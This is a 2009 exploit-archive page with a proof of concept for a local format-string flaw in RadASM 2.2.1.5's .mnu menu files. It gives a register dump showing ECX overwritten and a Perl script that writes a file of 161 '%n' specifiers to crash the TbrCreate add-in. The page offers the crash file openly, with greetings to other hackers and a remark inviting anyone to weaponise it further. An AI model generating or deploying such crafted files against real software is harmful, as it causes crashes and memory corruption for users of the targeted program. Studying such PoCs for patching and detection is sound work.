RadASM 2.2.1.5 (.mnu File) Local Format String PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RadASM 2.2.1.5 (.mnu File) Local Format String PoC
# Published : 2009-08-03
# Author : SkuLL-HacKeR
# Previous Title : RadASM 2.2.1.6 Menu Editor (.mnu) Stack Overflow PoC
# Next Title : Google SketchUp Pro 7.0 (.skp file) Remote Stack Overflow PoC

# RadASM 2.2.1.5 (.mnu File) Format string Poc
# By SkuLL-HacKeR
# GreetZ : hack4love - Aser ro7 - ThE g0bL!N - Qabandi
# EAX 00002E2E
# ECX 41413D92 ECX overwrited
# EDX 00000002
# EBX 00000000
# ESP 0013F894
# EBP 0013F9AC ASCII "..................................................................."
# ESI 00187658 ASCII "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
# EDI 0013FFFE
# EIP 0040171A TbrCreat.0040171A
# directory app
# C:Documents and SettingsAdministrateurBureauaRadASMAddInsTbrCreate.exe
# i think is hard to exploit maybe anyone can exploit it :d
my $unicode="%n" x 161;
my $file="xpl.mnu";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $unicode ;
close($FILE);
print "$file has been created n";

# www.Syue.com [2009-08-03]